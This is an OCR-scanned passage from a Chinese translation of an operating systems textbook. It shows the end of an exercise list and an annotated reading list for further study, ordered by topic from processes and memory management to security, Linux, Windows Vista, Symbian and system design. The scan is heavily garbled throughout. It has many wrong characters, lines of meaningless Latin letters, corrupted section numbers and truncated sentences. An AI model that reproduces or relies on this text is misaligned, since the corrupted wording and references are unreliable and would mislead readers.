用 下 述 方法 在 数组 中 搜索 给 定 的 字符 串 : a) 简 单 的 线性 搜索 CR 
法 ) ，b) 目 选 的 更 加 复杂 的 方法 。 对 于 从 小 型 数组 到 你 的 系统 所 能 处 
理 的 最 大 数组 这 样 的 数组 大 小 范围 重新 编译 你 的 程序 。 评 佑 两 种 方法 
的 性 能 。 收 文平 衡 总 在 哪里 ? 


28. 编 写 一 个 程序 模拟 在 内 存 中 的 文件 系统 。 


第 14 章 ”阅读 材料 及 参考 文献 


在 前 13 革 中 我 们 已 经 介绍 了 操作 系统 的 许多 内 容 。 本 章 的 目的 在 
于 辣 那 些 希 户 对 操作 系统 进行 进一步 研究 的 读者 提供 一 些 帮 助 。14.1 
节 列 出 了 向 读者 推荐 的 阅读 材料 ，14.2 厄 按照 字母 顺序 列 出 了 本 书 中 
所 引用 的 所 有 书籍 和 文章 。 


除了 下 面 给 出 的 参考 书目 以 外 ， 和 奇数 年 份 举 行 的 ACM 操 作 系 统 原 
理学 术 会 议 (Symposium on Operating Systems Principles,SOSP) 和 偶 
数 年 份 举行 的 USENIX 操 作 系 统 设计 与 实现 学 术 会 议 (Symposium on 
Operating Systems Design and Implementation, OSDI) 也 是 了 解 目 前 操作 
系统 领域 研究 工作 的 很 好 渠道 。 一 年 一 度 的 Eurosys 200x 会 议 也 有 一 流 
的 文章 。 还 可 以 在 《ACM Transactions on Computer Systems》 和 


«ACM SIGOPS Operating Systems Review》 两 份 杂志 中 找到 一 些 相关 
的 文章 。 另 外 ACM、IEEE 和 USENIX 的 许多 会 议 也 涉及 到 有 关 的 内 


SN 
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14.1 ”进行 深入 阅读 的 建议 


在 以 下 各 小 节 中 ， 我 们 给 出 一 些 深入 阅读 的 建议 。 与 本 书 中 标题 
为 “与 .…. 有 关 的 研究 工作 ”小节 中 引用 的 那些 有 关 当 前 研究 工作 的 文章 
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把 它们 看 作 本 书 中 所 介绍 内 容 的 不 同 视 角 和 不 同 的 着 重点 。 


14.1.1 简介 及 概要 


Silberschatz et al., Operating System Concepts with Java,7th ed. 


关于 操作 系统 的 一 本 通用 教材 。 它 涵盖 了 进程 、 内 存 管理 、 存 储 
管理 、 保 护 和 安全 、 分 布 式 系统 和 一 些 专用 系统 等 方面 的 内 容 。 书 中 
给 出 了 两 个 实例 :Linux 和 Windows XP。 书 的 封面 全 是 恐龙 ， 这 与 公 
元 2000 年 的 操作 系统 有 什么 关系 不 十 分 清楚 。 


Stallings, Operating Systems, 5th ed. 


这 年 有 关 操 作 系 统 的 另 一 本 教科 书 。 它 镁 兰 了 所 有 传统 的 内 容 ， 
还 包括 少量 分 布 式 系统 的 内 容 。 


Stevens and Rago, Advanced Programming in the UNIX 


Environment 


该 书 和 叙述 如 何 使 用 UNIX 系 统 调 用 接口 以 及 标准 C 库 编写 C 程 序 。 
有 基于 System V 第 4 版 以 及 UNIX 4.4BSD 版 的 例子 。 有 关 这 些 实现 与 
POSIX 的 关系 在 书 中 有 具体 叙述 。 


Tanenbaum and Woodhull, “Operating Systems Design and 


Implementation” 

一 个 通过 动手 实践 来 学 习 操作 系统 的 方法 。 这 本 书 主要 介绍 了 一 
些 见 的 原理 ， 另 外 详细 介绍 了 一 个 真实 的 操作 系统 
且 附 市 了 这 个 操作 系统 的 清单 。 


MINIX3。 并 


14.1.2 ”进程 和 线程 


Andrews and Schneider, “Concepts and Notations for Concurrent 


Programming” 


古 一 本 关于 进程 和 进程 间 通 信和 的 教程 ， 包 括 忙 等 往 
管 程 、 消 息 传 递 以 及 其 他 技术 。 文 章 中 同时 也 说 明了 这 些 概念 是 如 何 
舱 入 到 不 同 编程 语言 中 去 的 。 这 篇 文章 非 单 老 ， 但 是 却 经 受 住 了 时 间 
的 考验 。 


Ben-Ari, Principles of Concurrent Programming 


这 本 书 专门 讨论 了 进程 间 的 通信 间 题 ， 其 他 章节 则 讨论 了 互 斥 
性 、 信 号 量 、 管 程 以 及 哲学 家 就 餐 问 题 等 。 


Silberschatz et al., Operating System Concepts with Java,7th ed. 


该 书 的 第 4 一 6 革 讨 论 了 进程 和 进程 间 通 信 ， 包 括 调度 、 临 界 区 、 
信号 量 、 管 程 以 及 经 典 的 进程 间 通 信 问 题 。 


141.3 ”存储 管理 


Denning, “Virtual Memory” 


该 文 是 一 篇 关于 虚拟 内 存 诸多 特性 的 经 典 文章 。 作 者 Denning 是 该 
领域 的 先驱 之 一 ， 正 古 他 创立 了 工作 集 概念 。 


Denning, “Working Sets Past and Present” 


该 书 很 好 地 图 述 了 大 容量 存储 器 的 管理 和 页 面 置 换算 法 。 书 后 附 
有 完整 的 参考 文献 。 虽 然 其 中 很 多 文章 部 非常 老 了 ， 但 十 原理 实际 根 
本 没有 变化 。 


Knuth, The Art of Computer Programming, Vol.1 


该 书 讨论 并 比较 了 首次 适 配 算法 、 最 佳 适 配 算法 和 其 他 一 些 存 储 
管理 算法 。 


Silberschatz et al., Operating System Concepts with Java,7th ed. 


该 书 第 8 章 和 第 9 章 讨论 了 存储 管理 ， 包 括 交 换 、 分 页 和 分 段 等 。 
书 中 提 到 了 很 多 页 面 置换 算法 。 


14.1.4 输入 /输出 


Geist and Daniel, “A Continuum of Disk Scheduling Algorithms” 


该 文 给 出 了 一 个 通用 的 磁盘 辟 调 度 算法 ， 并 给 出 了 详细 的 模拟 和 
实验 结果 。 


Scheible, “A Survey of Storage Options” 


现在 存储 的 方法 很 多 DRAM, SRAM, SDRAM, NE, fet, 
软盘 ，CD-ROM，DVD， 还 有 位 带 等 。 这 篇 文章 对 这 些 技术 进行 了 评 
述 ， 着 重 总 结 了 它们 的 优 缺 点 。 


Stan and Skadron, “Power-Aware Computing” 
能 源 问题 始终 是 移动 设备 的 主要 问题 ， 直 到 有 人 能 设法 将 摩尔 定 
律 运用 于 电池 技术 为 止 。 我 们 甚至 有 可 能 在 不 久 束 需要 一 个 可 感知 瘟 


度 的 操作 系统 。 这 篇 文章 束 是 针对 这 些 问 题 的 一 个 综述 ， 同 时 介绍 对 


能 源 感知 计算 中 的 计算 机 这 一 特定 问题 的 5 篇 文章 。 


Walker and Cragon, “Interrupt Processing in Concurrent Processors” 


在 超标 量 计算 机 中 精确 实现 中 断 是 一 项 具有 挑战 性 的 工作 。 其 技 
巧 在 于 将 状态 序列 化 并 且 快 速 地 完成 这 项 工作 。 文 中 讨论 了 许多 设计 


问题 以 及 相关 的 权衡 考虑 。 


14.1.5 ”文件 系统 


McKusick et al., “A Fast File System for UNIX” 


在 4.2BSD 环 境 下 重新 实现 了 UNIX 的 文件 系统 。 该 文 描 述 了 新 文 
件 系 统 的 设计 ， 并 把 重点 放 在 其 性 能 上 。 


Silberschatz et al., Operating System Concepts with Java,7th ed. 


该 书 第 10~11 章 与 文件 系统 有 关 ， 涉 及 文件 操作 、 文 件 访问 广 
式 、 目 录 以 及 实现 和 其 他 内 容 等 。 


Stallings, Operating Systems, 5th ed. 


该 书 第 12 章 包括 许多 有 关 安 全 环境 的 内 容 ， 特 别 是 有 头 墨客 、 病 
毒 以 及 其 他 威胁 等 内 容 。 


14.1.6 ZEF 


Coffman et al., “System Deadlocks” 
TASC BEIT ZA T IED ` ENT E JRA A Be AF A RM) 。 
Holt, “Some Deadlock Properties of Computer Systems” 


该 文 围绕 死 锁 进行 了 讨论 。Holt 引 入 了 一 个 可 用 来 分 析 某 些 死 锁 
情况 的 有 向 图 模型 。 


Isloor and Marsland, “The Deadlock Problem: An Overview” 


这 是 关于 死 锁 的 入 门 教程 ， 重 点 放 在 了 数据 库 系统 ， 也 介绍 了 多 
种 模型 和 算法 。 


Shub, “A Unified Treatment of Deadlock” 


这 十 一 部 关于 死 锁 产 生 和 解决 的 简短 综述 ， 同 时 也 给 出 了 一 些 在 
教学 时 应 当 强 调 内 容 的 建议 。 


14.1.7 多 媒体 操作 系统 


Lee, “Parallel Video Servers: A Tutorial” 


多 组 织 想 提供 视频 点 播 ， 这 残 需 要 拥有 可 扩展 的 、 容 错 的 并 行 
视频 服务 器 。 文 中 介绍 了 怎样 构建 这 种 服务 圳 的 主要 问题 ， 包 括 服务 
给 的 体系 结构 、 条 这 化 、 布 局 策略 、 人 负载 平衡 、 元 余 、 协 议 以 及 同 
JE 0 
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Leslie et al., “The Design and Implementation of an Operating 


System to Support Distributed Multimedia Applications” 


许多 多 媒体 实现 的 尝试 都 是 在 现 有 的 操作 系统 上 增加 一 些 功能 ， 
男 一 个 方 同 是 全 部 重新 开发 ， 殊 像 该 文 搬 述 的 一 样 ， 为 多 媒体 构建 一 
个 新 的 操作 系统 ， 不 需要 为 辐 下 兼容 而 进行 修改 。 这 样 做 的 结果 是 产 
生 一 个 与 传统 操作 系统 截然 不 同 的 新 系统 。 


Sitaram and Dan, “Multimedia Servers” 


多 媒体 服务 器 与 通 币 的 文件 服务 右 有 很 多 不 同 之 处 。 作 者 详细 讨 
论 了 这 些 不 同 ， 特 别 和 是 在 调度 、 存 储 子 系统 和 高 速 缓存 这 几 个 方面 。 


14.1.8 多 处 理 机 系统 


Ahmad, “Gigantic Clusters: Where Are They and What Are They 


Doing?” 


Er 
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为 了 了 解 大 型 多 计算 机 系统 的 先进 性 ， 可 以 读 这 篇 文章 。 它 描述 
了 这 一 思想 ， 并 且 给 出 了 对 当前 在 使 用 的 一 些 大 型 系统 的 概况 介绍 
根据 摩尔 定律 可 以 合理 推断 ， 这 里 提 到 的 规模 大 约 每 两 年 束 会 增长 一 


Dubois et al., “Synchronization, Coherence, and Event Ordering in 


Multiprocessors” 


该 文 是 一 个 天 于 基于 共 至 存储 句 多 处 理 紫 系统 中 同步 问题 的 指 
南 ， 而 且 ， 其 中 的 一 些 思想 对 于 单 处 理 器 和 分 布 式 存储 系统 也 是 适用 
的 。 


Geer, “For Programmers, Multicore Chips Mean Multiple 


Challenges” 


多 核心 片 的 时 代 正 在 到 来 一 一 不 论 软件 界 的 人 们 是 否 准 备 好 。 
际 上 他 们 并 没有 谁 备 好 ， 而 且 为 这 些 心 片 编写 程序 往往 是 巨大 的 挑 


战 ， 这 包括 选择 合适 的 工具 、 将 有 关 工 作 划 分 成 小 的 部 分 ， 以 及 测试 


Kant and Mohapatra, “Internet Data Centers” 


Internet 数 据 中 心 是 一 个 被 兴 理 剂 刺激 起 来 的 巨大 多 计算 机 。 篆 各 
让 成 干 上 万 台 计 算 机 为 一 个 应 用 软件 而 工作 。 这 里 的 主要 问题 束 是 可 
伸缩 性 、 可 维护 性 和 人 能源。 这 篇 文章 既 古 对 有 关 问 题 的 一 个 介绍 ， 也 
征 对 同一 个 问题 的 其 他 4 篇 文章 的 介绍 。 


Kumar et al., “Heterogeneous Chip Multiprocessors” 


HER AEI ENZ Sr eR t — PK EAI) o PK 
而 对 一 些 应 用 软件 来 说 ， 异 构 的 多 处理 器 (Chip 
multiprocessors,CMPS) 是 很 普 裔 的 ， 有 的 核 用 来 计算 、 有 的 处 理 视频 
编码 、 有 的 处 理 首 频 编码 等 。 这 篇 文章 束 讨 论 异 构 多 人 处理 占 中 的 有 关 


问题 。 


Kwok and Ahmad, “Static Scheduling Algorithms for Allocating 


Directed Task Graphs to Multiprocessors” 


如 果 提 前 知道 所 有 作业 的 特性 ， 丈 可 能 对 多 计算 机 系统 或 者 多 处 
理 絮 进行 优化 作业 调度 。 问 题 在 于 最 优 调 度 的 计算 时 间 会 很 长 。 在 这 


篇 论文 中 ， 作 者 讨论 并 且 比 较 了 用 不 同方 法 解决 这 个 问题 的 27 种 著名 
的 算法 。 


Rosenblum and Garfinkel, “Virtual Machine Monitors: Current 


Technology and Future Trends” 
这 篇 文章 从 虚拟 机 监视 器 的 历史 谈 起 ， 然 后 讨论 现 有 处 理 器 、 内 


存 和 IO 的 虚拟 化 情况 。 文 章 涉及 的 领域 不 但 包括 上 面 三 个 方面 ， 还 包 
括 将 来 如 何 用 硬件 来 减少 这 些 问题 。 


Whitaker et al., “Rethinking the Design of Virtual Machine 


Monitors” 


多 数 计 算 机 都 有 一 些 奇 怪 和 难于 虚拟 化 的 方面 。 在 这 篇 文章 中 
Denali 系 统 的 作者 殉 虚 拟 化 进行 了 一 些 探讨 ， 即 如 何 修改 客户 操作 系 
统 以 避免 遇 到 一 些 奇 怪 的 特性 ， 由 此 来 防止 仿真 这 些 特性 。 


1415. ae 


Bratus, “What Hackers Learn That the Rest of Us Don't” 


征 什 么 让 黑客 如 此 与 众 不 同 ? 他 们 所 关注 的 ， 而 一 般 程序 员 却 名 
上 略 的 ， 是 什么 ?他 们 对 API 人 态度 不 同 吗 ? 文 末 问 题 重 要 吗 ? 读者 好 奇 
吗 ? 如 果 感 兴趣 ， 建 议 读 一 读 。 


Computer, Feb 2000 


这 一 期 Computer 的 主题 是 生物 测量 学 。 关 于 这 个 主题 有 6 篇 论文 ， 
从 入 门 到 专题 ， 从 各 种 特定 技术 到 法 律 和 隐私 问题 ， 论 文 都 有 涉及 。 


Denning, Information Warfare and Security 


言 息 已 经 变 成 了 战争 武器 ， 既 是 军事 武器 也 是 军事 配合 武器 。 参 
与 者 不 仅 尝试 攻击 对 方 的 信息 系统 ， 而 且 要 防卫 好 自己 的 系统 。 在 这 
本 吸引 人 的 书 中 ， 作 者 讨论 了 所 有 能 想到 的 关于 攻击 策略 和 防卫 策略 
的 话题 ， 从 数据 获 骗 到 包 窥探 器 。 该 书 对 于 计算 机 安全 有 极 大 兴趣 的 
读者 来 说 是 必 读 的 。 


Ford and Allen, “How Not to Be Seen” 


病毒 ， 间 谍 软 件 ，rootkits 和 数字 版 权 管理 系统 都 对 隐藏 数据 情 有 
独 钟 。 这 篇 文章 对 各 种 隐身 的 方法 进行 了 简要 的 介绍 。 


Hafner and Markoff, Cyberpunk 


书 中 介绍 了 由 《纽约 时 报 》 曾 经 写 过 网 络 蠕虫 故事 〈 马 尔 可 夫 
链 ) 的 计算 机 记者 讲述 的 世界 上 关于 年 轻 黑 客 破坏 计算 机 的 三 种 流传 
最 广 的 故事 。 


Johnson and Jajodia, “Exploring Steganography: Seeing the 


Unseen” 


BARRAKA, ARRERA DE, Aha teal 
光 的 头 上 纹 上 信息 ， 然 后 在 信使 的 头发 长 出 来 之 后 再 将 他 送 走 的 年 
代 。 尽 管 当前 的 技术 很 多 ,但 是 它们 也 是 数字 化 的 。 本 书 对 于 想 在 这 
一 主题 彻 确 入 门 的 读者 来 说 是 一 个 开端 。 


Ludwig, The Litte Black Book of Email Viruses 
如 果 想 编写 反 病毒 软件 并 且 想 了 解 在 位 级 别 (bit level) 上 这 些 病 
毒 是 怎么 工作 的 ， 那 么 这 本 书 很 适合 。 每 种 病毒 都 有 详细 的 讨论 并 且 


也 提供 了 绝 大 多 数 的 实际 代码 。 但 是 ， 要 求 读者 透彻 掌握 Pentium 汇 纺 
语言 编程 知识 。 


Mead, “Who is Liable for Insecure Systems?” 


很 多 有 头 计算 机 安全 的 措施 都 是 从 扩 术 角度 出 发 的 ， 但 是 这 不 
惟一 的 角度 。 也 许 软件 经 销 商 应 该 对 由 于 他 们 的 问题 软件 而 市 来 的 损 
失 负 起 责任 。 如 有 果 比 现在 更 多 地 关注 于 安全 ， 这 会 是 经 销 商 的 机 会 
吗 ? 对 这 个 提 法 感 兴趣 吗 ? 可 以 读 一 下 这 篇 文章 。 


Milojicic, “Security and Privacy” 


安全 性 涉及 很 多 方面 ， 包 括 操作 系统 、 网 络 、 私 密 性 表示 等 。 在 
这 篇 文章 中 ，6 位 安全 方面 的 专家 给 出 了 他 们 各 目 天 于 这 个 主题 的 想法 
和 见解 。 


Nachenberg, “Computer Virus-Antivirus Coevolution” 


当 反 病毒 的 开发 人 员 找 到 一 种 方法 能 够 探测 某 种 电脑 病毒 并 且 使 

其 失效 时 ， 病 毒 的 编写 者 已 经 在 改进 和 开发 更 强 的 病毒 。 本 书 探讨 了 
这 种 制造 病毒 和 反 病 毒 之 间 的 “ 猫 和 老鼠 ”游戏 。 作 者 对 于 反 病 毒 编 写 
者 能 否 取胜 这 场 游戏 并 不 持 乐 观 态度 ， 这 对 电脑 用 户 来 说 也 许 不 是 一 


Pfleeger, Security in Computing, 4th ed. 


尽管 已 经 出 版 了 很 多 关于 计算 机 安全 的 书籍 ， 但 大 多 数 却 只 关注 
网 络 安全 性 。 本 书 不 仅 关 注 网 络 安全 性 ， 还 包含 了 讨论 操作 系统 安全 
性 、 数 据 库 安全 性 和 分 布 式 系统 安全 性 的 章 下 。 


Sasse, “Red-Eye Blink,Bendy Shuffle,and the Yuck Factor:A User 


Experience of Biometric Airport Systems” 


Vee tuk TES ADL A RELA RSC Ame e Ae 
所 有 的 体验 都 是 正面 的 。 


Thibadeau, “Trusted Computing for Disk Drives and Other 


Peripherals” 
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通信 通道 甚至 有 目 己 的 局 动 ROM。 简 而 言 之 ， 它 束 是 一 个 完整 的 计算 
机 系统 ， 很 容易 被 攻击 ， 因 此 它 也 需要 有 目 己 的 保护 机 制 。 这 篇 文章 
DY TOA Ot re WE oe SO) ae HEC | eo 


14.1.10 Linux 


Bovet and Cesati, Understanding the Linux Kernel 
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程 、 存 储 管 理 、 文 件 系 统 和 信号 等 内 容 。 


IEEE, Information Technology 


Portable Operating System 
Interface (POSIX) , Part 1: SystemApplication Program Interface 


(API) [C Language] 
这 是 一 个 标准 。 一 些 部 分 确实 值得 一 读 ， 特 别 是 附录 B， 清 晰 闻 
述 了 为 什么 要 这 样 做 。 参 考 标准 的 一 个 好 处 在 于 通过 定义 不 会 出 现 错 


误 。 例 如 ， 如 采 一 个 安 的 名 字 中 的 排 字 错误 贯穿 了 整个 编辑 过 程 ， 那 
么 它 将 不 再 是 一 个 错误 ， 而 成 为 一 种 正式 标准 。 


Fusco, The Linux Programmers'Toolbox 


这 本 书 是 为 那些 知道 一 些 基本 Linux 知 识 ， 并 且 和 希望 能 够 进一步 了 
解 Linux 程 序 如 何 工作 的 中 级 读者 们 写作 的 。 该 书 假定 读者 是 一 个 C 程 
Fms 


Maxwell, Linux Core Kernel Commentary 


该 书 的 前 400 页 给 出 了 Linux 的 内 核 源 代码 的 一 个 子 集 。 后 面 的 150 
页 则 是 对 这 些 代码 的 评述 。 与 John Lions 的 经 典 书籍 (1996) 风格 很 相 
似 。 如 果 你 想 了 解 Linux 内 核 的 很 多 细节 ， 那 么 这 是 一 个 不 错 的 起 点 ， 
但 是 读 40 000 行 C 语 言 代 码 不 是 每 个 人 都 必需 的 。 


14.1.11 Windows Vista 


Cusumano and Selby, “How Microsoft Builds Software” 


你 是 否 曾经 好 奇 过 一 个 人 如 何 能 够 写 出 29 000 000 行 代码 〈 就 像 
Windows 2000 一 样 ) ， 并 且 让 它 作 为 一 个 整体 运转 起 来 ?希望 探究 微软 
征 如 何 采 用 建造 和 测试 循环 来 管理 大 型 软件 项 目的 读者 ， 可 以 参看 这 
篇 论文 。 其 过 程 相当 有 局 发 性 。 


Rector and Newcomer，Win32 Programming 


如 果 想 找 一 本 1500 页 的 书 ， 告 诉 你 如 何 编写 windows 程 序 ， 那 么 
读 这 本 书 是 一 个 不 错 的 开始 。 它 涵盖 了 窗口 、 设 备 、 图 形 输 出 、 键 盘 
和 鼠标 输入 、 打 印 、 存 储 管理 、 库 和 同步 等 许多 主题 。 阅 读 这 本 书 要 
求 读者 具有 C 或 者 C++ 语言 的 知识 。 


Russinovich and Solomon, Microsoft Windows Internals,4th ed. 


如 果 想 学 习 如 何 使 用 Windows， 可 能 会 有 几 百 种 相关 的 书 。 如 果 
想 知 道 Windows 内 部 如 何 工作 的 ， 本 书 是 读者 最 好 的 选择 。 它 给 出 了 
很 多 内 部 算法 和 数据 结构 以 及 可 观 的 技术 细节 。 没 有 任何 一 本 书 可 以 
BLE o 


14.1.12 Symbian 操作 系统 


Cinque et al., “How do Mobile Phone Fail?A Failure Data Analysis 


of Symbian OS Smart Phones” 

以 前 不 论 怎样 ， 当 计算 机 裔 省 时 ， 至 少 电话 总 是 可 以 用 的 。 而 现 
在 电话 其 实 束 是 一 个 小 屏幕 的 计算 机 ， 它 们 也 会 因为 糟糕 的 软件 而 裔 
溃 。 本 文 讨论 了 可 以 导致 Symbian 手机 或 者 终端 般 溃 的 软件 错误 。 


Morris, The Symbian OS Architecture Sourcebook 
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书 是 一 个 很 好 的 开始 。 它 涉及 了 Symbian 的 体系 结构 和 相当 数量 的 各 
层 细 记 ， 而 且 还 给 出 了 一 些 实例 分 析 。 


Stichbury and Jacobs, The Accredited Symbian Developer Primer 


如 果 你 对 为 Symbian 手 机 或 者 掌上 电脑 如 何 开发 应 用 软件 感 兴趣 
的 话 ， 那 么 本 书 征 一 个 不 错 的 选择 。 它 从 所 需要 的 C++ 语言 讲 起 ， 逐 
步 深入 到 系统 结构 、 文 件 系统 、 网 络 管理 、 工 具 链 和 兼容 性 。 


14.1.13 ”设计 原则 


Brooks, The Mythical Man Month: Essays On Software Engineering 


Fred Brooks 是 IBM 的 OS/360 的 主要 设计 者 之 一 。 以 其 丰富 的 经 
验 ， 他 知道 在 计算 机 的 设计 中 什么 是 可 以 运行 的 和 什么 是 不 能 运行 
的 。 他 在 25 年 前 写 下 这 本 该 谐 且 内 涵 丰 富 的 书 中 给 出 的 建议 现在 一 样 
是 可 行 的 。 


Cooke et al., “UNIX and Beyond: An Interview with Ken 


Thompson” 


设计 一 个 操作 系统 与 其 说 是 一 门 科学 ， 不 如 说 是 一 门 艺术 。 因 
此 ， 倾 听 该 领域 专家 的 谈话 是 一 个 学 习 这 方面 知识 的 有 效 途 径 。 在 操 
作 系 统领 域 中 ， 没 有 谁 比 Ken Thompson 更 有 发 言 权 的 了 。 在 对 这 位 
UNIX、Inferno、Plan9 操 作 系统 的 合作 设计 者 的 访问 过 程 中 ，Ken 
Thompson 曾 明了 在 这 个 领域 中 我 们 从 哪里 开始 和 即将 走 回 哪里 等 问 


题 。 


Corbato, “On Building Systems That Will Fail” 


在 获得 图 灵 交 的 演讲 大 会 上 ， 这 位 分 时 系统 之 父 阐 述 了 许多 
Brooks 在 《人 月 神话 》 中 同样 关注 的 问题 。 他 的 结论 征 所 有 的 复杂 系 
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Crowley, Operating Systems:A Design-Oriented Approach 


大 多 数 介绍 操作 系统 的 教材 仅仅 是 讲 操作 系统 的 基本 概念 (进程 
调度 、 虚 拟 内 存 等 ) 和 列举 一 些 例子 ， 对 于 如 何 设计 一 个 操作 系统 却 
没有 所 及 。 该 书 独一无二 的 特点 在 于 有 4 章 是 说 明 如 何 设计 一 个 操作 系 


统 的 。 


Lampson, “Hints for Computer System Design” 


世界 上 最 主要 的 具有 创新 性 的 操作 系统 设计 者 
之 一 ， 在 他 多 年 的 设计 经 历 中 总 结 了 许多 设计 方法 、 对 设计 的 建议 和 
一 些 指导 原则 并 写 下 这 篇 该 谐 的 内 泣 丰 富 的 文章 ， 正 如 Brooks 的 书 一 
样 ， 对 于 有 抱负 的 操作 系统 的 设计 者 来 说 ， 这 本 书 一 定 不 要 错过 。 


Butler Lampson 


Wirth, “A Plea for Lean Software” 


著名 的 经 验 丰 富 的 系统 设计 者 ， 曾 设计 了 面向 
网 络 的 基于 图 形 用 户 界面 的 操作 系统 Oberon， 包 括 Oberon 编 译 器 和 文 
本 编辑 器 ， 只 有 200KB。 通 过 讨论 Oberon 系 统 ， 他 阐明 软件 应 该 基于 
人 简单 的 概念 ， 使 其 简单 明了 ， 而 不 是 商用 化 软件 的 复 洒 。 


Niklaus Wirth 
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